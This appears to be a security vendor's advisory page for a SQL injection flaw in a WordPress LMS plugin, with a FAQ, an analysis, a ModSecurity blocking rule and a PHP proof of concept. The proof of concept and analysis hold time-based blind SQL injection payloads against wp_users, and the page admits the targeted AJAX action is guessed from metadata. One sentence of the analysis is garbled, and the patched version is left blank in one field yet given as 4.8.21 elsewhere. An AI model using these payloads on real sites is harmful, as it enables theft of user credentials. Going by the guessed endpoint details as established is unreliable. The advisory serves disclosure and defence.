What is CVE-2026-8653?

CVE-2026-8653 is a SQL injection vulnerability in the MasterStudy LMS Pro Plus plugin for WordPress. It allows authenticated users with instructor-level access or higher to manipulate SQL queries through the ‘columns’ parameter, potentially exposing sensitive data.

How does the SQL injection occur?

The vulnerability arises from insufficient escaping of user input in the SQL SELECT clause. Attackers can append malicious SQL code to the ‘columns’ parameter, enabling them to execute arbitrary SQL queries and extract information from the database.

Who is affected by this vulnerability?

Any WordPress site using MasterStudy LMS Pro Plus versions up to and including 4.8.20 is affected. Specifically, authenticated users with instructor-level permissions can exploit this vulnerability.

How can I check if my site is vulnerable?

Check the version of the MasterStudy LMS Pro Plus plugin installed on your WordPress site. If it is version 4.8.20 or earlier, your site is vulnerable to CVE-2026-8653.

What is the severity of this vulnerability?

CVE-2026-8653 has a CVSS score of 6.5, indicating a medium severity level. This means that while it does not allow for remote code execution or denial of service, it can lead to significant data exposure if exploited.

What are the potential impacts of exploitation?

Successful exploitation allows attackers to read sensitive data from the WordPress database, including user credentials and other confidential information. This compromises data confidentiality and may lead to further attacks.

How can I fix this vulnerability?

Update the MasterStudy LMS Pro Plus plugin to version 4.8.21 or later, where the vulnerability is patched. Ensure that the plugin uses proper SQL query preparation techniques to avoid SQL injection.

What should I do if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the plugin until a patch can be applied. Additionally, review user permissions and limit access to only necessary personnel.

What does the proof of concept demonstrate?

The proof of concept illustrates how an authenticated user can exploit the vulnerability by sending a crafted request to the AJAX handler. It shows how to manipulate the ‘columns’ parameter to execute arbitrary SQL queries.

Is there a way to validate the input to prevent this issue?

Yes, the recommended approach is to use $wpdb->prepare() with placeholders for SQL queries. Additionally, validating the ‘columns’ parameter against a whitelist of allowed values can help mitigate the risk.

What are the best practices to follow after a vulnerability is disclosed?

After a vulnerability is disclosed, promptly update affected plugins, review security practices, and monitor logs for suspicious activity. Additionally, educate users about security best practices to prevent future incidents.

Published : June 21, 2026

CVE-2026-8653: MasterStudy LMS Pro Plus <= 4.8.20 Authenticated (Instructor+) SQL Injection via 'columns' Parameter PoC, Patch Analysis & Rule

CVE ID CVE-2026-8653

Plugin masterstudy-lms-learning-management-system-pro

Severity Medium (CVSS 6.5)

CWE 89

Vulnerable Version 4.8.20

Patched Version —

Disclosed June 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-8653 (metadata-based):

MasterStudy LMS Pro Plus prepare() with placeholders for the ‘columns’ value. Instead, it directly concatenates the user input into the SQL SELECT clause. This is a classic SQL injection pattern where unescaped data is inserted into a query string. We infer this from the CWE description; no source code diff confirms the exact location.

Exploitation: An authenticated user with instructor capabilities can send a crafted HTTP request to a plugin AJAX handler or REST endpoint that accepts a ‘columns’ parameter. The attacker appends SQL after a UNION or OR statement within the ‘columns’ value. For example: action=stm_lms_get_course_analytics&columns=id,IF(1=1,SLEEP(2),0) or columns=id FROM wp_users– . The SQL injection is blind or error-based, allowing extraction of sensitive data such as user credentials, API keys, or other database contents. The specific AJAX action is likely ‘stm_lms_get_course_analytics’ or similar based on the plugin slug and context.

Remediation: The patched version (4.8.21) should use $wpdb->prepare() with placeholder (%s) for the ‘columns’ parameter, or strictly validate the input against a whitelist of allowed column names (e.g., array_key_exists check). Never concatenate user input directly into a SQL query. Additionally, ensure the ‘columns’ parameter is sanitized with sanitize_text_field() before any database interaction.

Impact: Successful exploitation allows an authenticated instructor to read any data from the WordPress database. This includes user passwords (hashed, but crackable), email addresses, session tokens, and potentially sensitive network configuration. Data confidentiality is fully compromised. No write or denial-of-service capability is indicated by the score, but SQL injection can often be chained to gain higher privileges or access the underlying server.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-8653 (metadata-based)
# Block SQL injection attempts via 'columns' parameter in MasterStudy LMS AJAX handler
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
    "id:20261993,phase:2,deny,status:403,chain,msg:'CVE-2026-8653 SQL Injection via columns parameter in MasterStudy LMS Pro Plus',severity:'CRITICAL',tag:'CVE-2026-8653'"
    SecRule ARGS_POST:action "@streq stm_lms_get_course_analytics" 
        "chain"
        SecRule ARGS_POST:columns "@rx (?:union|select|sleep|benchmark|intos+outfile|information_schema)" 
            "t:lowercase,t:urlDecode"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-8653 - MasterStudy LMS Pro Plus <= 4.8.20 - Authenticated (Instructor+) SQL Injection via 'columns' Parameter

// This PoC demonstrates blind SQL injection via the 'columns' parameter.
// Assumes the vulnerable endpoint is an AJAX handler expecting action, nonce, and columns parameters.
// Replace TARGET_URL, USERNAME, PASSWORD with actual test site credentials.

$target_url = 'http://example.com/wp-admin/admin-ajax.php';
$username = 'instructor_user';
$password = 'instructor_pass';

// Step 1: Authenticate and get WordPress nonce and cookies
$login_url = 'http://example.com/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'rememberme' => 'forever',
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Extract nonce (requires parsing a page that contains the nonce field)
// For this PoC, assume nonce is 'abc123' (replace with actual extraction in production)
$nonce = 'abc123';

// Step 3: Perform SQL injection via 'columns' parameter
// The payload uses a conditional check to determine if the admin user exists
$injection_payload = "id, (SELECT IF( (SELECT COUNT(*) FROM wp_users WHERE user_login='admin') = 1, SLEEP(2), 0) )";

$post_data = array(
    'action' => 'stm_lms_get_course_analytics', // Inferred likely action
    '_wpnonce' => $nonce,
    'columns' => $injection_payload,
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$response = curl_exec($ch);
curl_close($ch);

echo "Response: " . $response . "n";
if (strpos($response, 'error') !== false) {
    echo "Injection failed or endpoint not found. Adjust action name or payload.n";
} else {
    echo "Injection attempt completed. Check response for data leak or delayed response.n";
}
?>

Frequently Asked Questions

What is CVE-2026-8653?
Understanding the vulnerability
CVE-2026-8653 is a SQL injection vulnerability in the MasterStudy LMS Pro Plus plugin for WordPress. It allows authenticated users with instructor-level access or higher to manipulate SQL queries through the ‘columns’ parameter, potentially exposing sensitive data.
How does the SQL injection occur?
Mechanism of exploitation
The vulnerability arises from insufficient escaping of user input in the SQL SELECT clause. Attackers can append malicious SQL code to the ‘columns’ parameter, enabling them to execute arbitrary SQL queries and extract information from the database.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using MasterStudy LMS Pro Plus versions up to and including 4.8.20 is affected. Specifically, authenticated users with instructor-level permissions can exploit this vulnerability.
How can I check if my site is vulnerable?
Assessing your WordPress installation
Check the version of the MasterStudy LMS Pro Plus plugin installed on your WordPress site. If it is version 4.8.20 or earlier, your site is vulnerable to CVE-2026-8653.
What is the severity of this vulnerability?
Understanding risk levels
CVE-2026-8653 has a CVSS score of 6.5, indicating a medium severity level. This means that while it does not allow for remote code execution or denial of service, it can lead to significant data exposure if exploited.
What are the potential impacts of exploitation?
Consequences of a successful attack
Successful exploitation allows attackers to read sensitive data from the WordPress database, including user credentials and other confidential information. This compromises data confidentiality and may lead to further attacks.
How can I fix this vulnerability?
Remediation steps
Update the MasterStudy LMS Pro Plus plugin to version 4.8.21 or later, where the vulnerability is patched. Ensure that the plugin uses proper SQL query preparation techniques to avoid SQL injection.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If an immediate update is not possible, consider disabling the plugin until a patch can be applied. Additionally, review user permissions and limit access to only necessary personnel.
What does the proof of concept demonstrate?
Understanding the exploitation method
The proof of concept illustrates how an authenticated user can exploit the vulnerability by sending a crafted request to the AJAX handler. It shows how to manipulate the ‘columns’ parameter to execute arbitrary SQL queries.
Is there a way to validate the input to prevent this issue?
Preventing SQL injection
Yes, the recommended approach is to use $wpdb->prepare() with placeholders for SQL queries. Additionally, validating the ‘columns’ parameter against a whitelist of allowed values can help mitigate the risk.
What are the best practices to follow after a vulnerability is disclosed?
Post-disclosure security measures
After a vulnerability is disclosed, promptly update affected plugins, review security practices, and monitor logs for suspicious activity. Additionally, educate users about security best practices to prevent future incidents.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations